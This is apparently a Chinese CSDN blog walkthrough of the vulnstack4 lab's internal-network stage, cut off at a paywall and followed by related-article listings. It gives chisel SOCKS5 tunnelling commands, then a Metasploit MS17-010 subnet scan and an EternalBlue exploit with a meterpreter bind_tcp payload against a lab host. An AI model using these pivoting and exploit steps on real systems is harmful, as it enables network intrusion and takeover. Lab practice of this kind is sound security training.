vulnstack4渗透-内网篇

最新推荐文章于 2024-02-23 18:05:15 发布
最新推荐文章于 2024-02-23 18:05:15 发布
阅读量663 收藏
点赞数
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51441054/article/details/124548325
版权
chisel+msf攻入内网在kali上下载chisel再上传到Ubuntu上目标服务器开启服务端./chisel_1.7.6_linux_amd64 server -p 2333 --socks5攻击机kali开启客户端./chisel_1.7.6_linux_amd64 client 192.168.142.139:2333 socks攻击机1080端口开启了socks5监听。即实现将被拿下的目标web机上2333端口的流量转发到攻击机kali的1080端口。永.
摘要由CSDN通过智能技术生成

 chisel+msf攻入内网

在kali上下载chisel再上传到Ubuntu上

目标服务器开启服务端

./chisel_1.7.6_linux_amd64 server -p 2333 --socks5

攻击机kali开启客户端

./chisel_1.7.6_linux_amd64 client 192.168.142.139:2333 socks

攻击机1080端口开启了socks5监听。即实现将被拿下的目标web机上2333端口的流量转发到攻击机kali的1080端口。

永恒之蓝横向渗透攻击

search ms17_010

use auxiliary/scanner/smb/smb_ms17_010

set rhosts 192.168.183.0/24

set threads 50

先扫描ip哪些存在此漏洞,发现192.168.183.1,192.168.183.128两个ip存在

对192.168.183.128进行攻击

set Proxies socks5:127.0.0.1:1080
     #msf全局把代理指向127.0.0.1:1080(攻击机1080端口进行socks5监听)
use exploit/windows/smb/ms17_010_eternalblue   #加载渗透攻击模块
set payload windows/x64/meterpreter/bind_tcp   #因为使用代理所以正向监听
                                                              
set  AutoRunScript post/windows/manage/migrate  #自动化后渗透测试,执行
                                                                 #   一次就可以获得对目标的控制权限
set rhost    192.168.183.128 #设置内网域成员为目标机
set lport 4444  #设置监听端口
run

最低0.47元/天 解锁文章
挖洞的浅浅
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
vulnstack域环境靶场(四)
BROTHERYY的博客
12-09 1472
环境搭建 进入Ubuntu的web虚拟机,ubuntu为我们的web环境,其中的web环境需要手动开启,全部为docker环境,需要启动的环境分别为:s2-045、CVE-2017-12615、cve-2018-12613,启动方法如下: sudo su ubuntu docker-compose build docker-compose up 环境全部开启效果如下: 信息搜集 通过nmap发现主机开启以下服务,访问phpmyadmin属于未授权,直接就登录了 ...
靶场复现系列--vulnstack 4
梦之旅行地
12-17 1751
一、前言 也不知道是我运气差还是怎么回事,用vmw搭靶场就是搭不起来,遇到各种问题,后来换成virtual box后解决几个问题就可以了。 第一个问题,虚拟机导入后卡最好重新配下,不然容易报卡的错误 第二个问题,启动docker报错,web服务器(ubuntu)用户未加入docker组,将ubuntu用户加入docker组后,重启就可以通过docker构建容器了,下面是加入docker组的命令 sudo gpasswd -a ${USER} docker 二、实践 1.拓扑 备注:这图片直接在靶场
vulnstack4靶场笔记
orange777
02-05 2123
0x01 实验环境 目标端 ubuntu IP1: 192.168.157.128 IP2: 192.168.183.128 ubuntu:ubuntu win7 IP: 192.168.183.129 douser:Dotest123 DC IP: 192.168.183.130 administrator:Test2008 攻击端 windows7 192.168.157.129 kali 192.168.157.130 0x01 渗透测试 首先需要进入ubuntu开启服务,
红日靶机vulnstack04【半总结】
qq_45300786的博客
10-06 512
这次环境是3台机器, web服务器:000000 、DC:000000ydc. 、 win7 web服务器改ip有点麻烦,因为需要root用户才能改,给的ubuntu改不了。 所以我就进入高级模式下,修改了root用户的密码 关于虚拟机没有ipIP解决方案 然后再切到root用户修改ip win7 这台机器最麻烦,因为UAC开启最高模式,所以无论执行什么东西,都要输入账号密码 这里我的思路是先用msf的永恒之蓝拿到shell,然后再用下面这个链接去绕过UAC,提权为system权限。然后利用这个sy
红日安全ATT&CK靶机实战系列之vulnstack4
黑白的博客
04-25 8022
声明 好好学习,天天向上 环境配置 下载地址,直接进去用百度云,没有会员也下的非常快 http://vulnstack.qiyuanxuetang.net/vuln/detail/6/ 边下载着,可以开始vmware的络配置 有两个段,外段是我自己设置的桥接模式192.168.31.1/24,内段,vmware加一个卡VMnet3,192.168.183.1/24 和前面的大同小异,我这里就不细说了看过系列文章的应该都已经很清楚这种络结构了,我直接贴图吧 桥接的就是攻击机与边界服务器的
渗透-反弹shell.pdf
10-28
这是一份学习笔记,各个文章的摘抄整合。比较全面的反弹shell方法
ISC-渗透 -最终版.pdf
最新发布
04-08
ISC-渗透 -最终版
渗透测试-客户端渗透.pdf
02-25
《Metasploit渗透测试魔鬼训练营》读书笔记文档,是在我看书的过程中对书中理论和一些实践的总结。
sensitivefilescan-master-渗透的工具
07-14
【标题】"sensitivefilescan-master-渗透的工具" 涉及的主要知识点是络安全中的内渗透测试,这是一种用于评估企业内部络安全性的重要技术。内渗透测试是模拟黑客攻击,寻找并修复组织内部络的安全漏洞...
渗透测试-外链.pdf
05-04
渗透测试-外链.pdf
[HACK学习呀] - 2021-01-30 内渗透|Chisel内穿透工具1
08-03
一、chisel工具介绍 二、chisel工具下载使用 三、chisel隧道搭建
Windows6.1-KB2479943-x64.ms
01-24
Windows6.1-KB2479943-x64.ms
vulnstack4
m0_70782241的博客
02-23 1273
docker逃逸,域渗透
vulstack红队评估(四)
PANDA墨森的博客
06-21 1687
原文链接:https://www.cnblogs.com/PANDA-Mosen/p/13118210.html 一、环境搭建: ①根据作者公开的靶机信息整理 虚拟机密码: ubuntu: ubuntu:ubuntu win7: douser:Dotest123 Win2008 DC: administrator:Test2008,因为登陆要修改密码,所以改为了panda666... ②虚拟机卡设置 ubuntu双卡模拟内外: 外:192.168.1....
Vulnstack(四)
干铮的博客
05-24 1035
靶场拓扑 下载连接:http://vulnstack.qiyuanxuetang.net/vuln/detail/6/ 用的是VMware workstation 所以可能出现一些错误 Docker环境启动的是Vulhub的在线三个靶机 1.信息收集 主机发现 sudo netdiscover -i eth1 -r 192.168.157.0/24 端口扫描 nmap -A 192.168.53.128 -p- -oN nmap.a 2.apacheput文件上传脚本..
靶场vulnstack4内渗透
weixin_71169068的博客
11-18 1018
靶场vulnstack4内渗透
Vulnstack靶场4
weixin_48888525的博客
11-07 2668
环境 漏洞详情 (qiyuanxuetang.net) 仅主机模式内段192.168.183.0/24 外段192.168.157.0/24 其中Ubuntu作为对外的内机器  攻击机kali地址:192.168.157.129  悬剑:192.168.157.130 还需要进入ubuntu开启服务,密码ubuntu cd /home/ubuntu/Desktop/vulhub/struts2/s2-045vsudo docker-compose up -d cd
渗透靶场--vulnstack-红队评估实战(4)
weixin_45794666的博客
07-20 743
vulnstack-红队评估实战(4) 环境配置 web服务器 ubuntu:ubuntu 内192.168.183.131 外192.168.154.137 web服务需要自己启动分别为s2-045、CVE-2017-12615、cve-2018-12613 sudo su ubuntu cd /home/ubuntu/Desktop/vulhub/struts2/s2-045 docker-compose up 域成员机器 douser:Dotest123 192.168.183.128 域控
vulnstack红日-4
paidx0
07-11 306
vulnstack红日-4
渗透--DNS隧道
05-16
1. 禁止内主机直接访问外部DNS服务器,只允许内主机访问内部DNS服务器。 2. 配置内部DNS服务器,限制DNS请求和响应中的域名字段长度,防止DNS隧道传输数据。 3. 部署DNS防火墙,对DNS流量进行监控和过滤,防止...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值